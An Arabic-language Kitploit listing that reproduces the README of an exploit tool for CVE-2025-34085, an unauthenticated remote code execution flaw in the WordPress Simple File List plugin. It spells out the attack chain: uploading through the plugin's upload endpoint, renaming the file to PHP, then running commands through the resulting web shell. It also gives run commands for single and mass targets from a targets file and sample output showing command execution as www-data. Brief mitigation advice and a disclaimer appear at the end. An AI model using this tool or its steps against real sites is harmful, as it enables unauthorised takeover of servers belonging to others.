Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-34085 — استغلال ثغرة RCE بدون مصادقة في إضافة WordPress Simple File List | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2025-34085
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub0xgh057r3c0n/cve-2025-34085

CVE-2025-34085

استغلال ثغرة RCE بدون مصادقة في إضافة WordPress Simple File List

عرض المستودع
221منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شعار ووردبريس

CVE-2025-34085 — استغلال تنفيذ أوامر عن بُعد غير مصادق عليه في إضافة Simple File List لووردبريس

أداة استغلال وفحص آلية لثغرة CVE-2025-34085، وهي ثغرة حرجة في إضافة WordPress Simple File List، تتيح تنفيذ أوامر عن بُعد دون مصادقة عبر رفع وإعادة تسمية الملفات بطريقة تعسفية.


📄 ملخص الثغرة

  • معرف CVE: CVE-2025-34085
  • المكون المتأثر: إضافة ووردبريس — Simple File List
  • نوع الثغرة: رفع ملفات وإعادة تسميتها إلى ملفات قابلة للتنفيذ دون مصادقة
  • التأثير: تنفيذ أوامر عن بُعد (RCE)
  • مؤلف الاستغلال: 0xgh057r3c0n
  • ناقل الهجوم: عن بُعد، دون مصادقة

⚙️ سير عمل الاستغلال

  1. رفع الملف دون مصادقة

    • رفع ملف خبيث إلى المسار:
      /wp-content/plugins/simple-file-list/ee-upload-engine.php
  • إعادة التسمية إلى امتداد PHP

    • إعادة تسمية الملف المرفوع إلى .php أو امتداد مماثل عبر:
      /wp-content/plugins/simple-file-list/ee-file-engine.php
  • تنفيذ الحمولة

    • تنفيذ أوامر عشوائية بالوصول إلى الصدفة الويب المُعاد تسميتها.

  • 🚀 كيفية الاستخدام

    📌 هدف واحد

    root@kitploit:~
    python3 CVE-2025-34085.py -u http://target.com --cmd "id"
    

    📄 أهداف متعددة

    ضع عناوين URL للأهداف في ملف targets.txt (سطر واحد لكل هدف)، ثم شغّل:

    root@kitploit:~
    python3 CVE-2025-34085.py --cmd "whoami"
    

    🔧 خيارات سطر الأوامر

    الوسيطالوصف
    -uعنوان الهدف (مثل http://example.com)
    --cmdالأمر المطلوب تنفيذه على الصدفة البعيدة (الافتراضي: id)
    --inlineاستخدام حمولة مضمنة (بدون وسيط ?cmd=)

    ✅ نموذج الإخراج

    root@kitploit:~
    [+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    يتم حفظ الأهداف الناجحة في ملف vuln.txt.


    📁 الملفات

    • CVE-2025-34085.py — السكربت الرئيسي للاستغلال
    • targets.txt — (اختياري) قائمة نطاقات الأهداف
    • vuln.txt — سجل الاستغلالات الناجحة

    🛡️ الحماية

    ينبغي على المسؤولين:

    • تحديث الإضافة إلى أحدث إصدار آمن.
    • تقييد الوصول العام إلى نقاط رفع الملفات وإعادة تسميتها.
    • مراقبة المحتوى المرفوع للكشف عن ملفات PHP غير متوقعة.
    • نشر نظام جدار حماية تطبيقات ويب (WAF) أو نظام حماية نقطة النهاية.

    📘 إخلاء مسؤولية

    هذا المشروع مخصص لأغراض تعليمية واختبارات مصرح بها فقط. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.


    📄 الترخيص

    هذا المشروع مرخص بموجب رخصة MIT. 📄 عرض نص الترخيص الكامل


    👨‍💻 المؤلف

    0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n

    تنزيل الأداة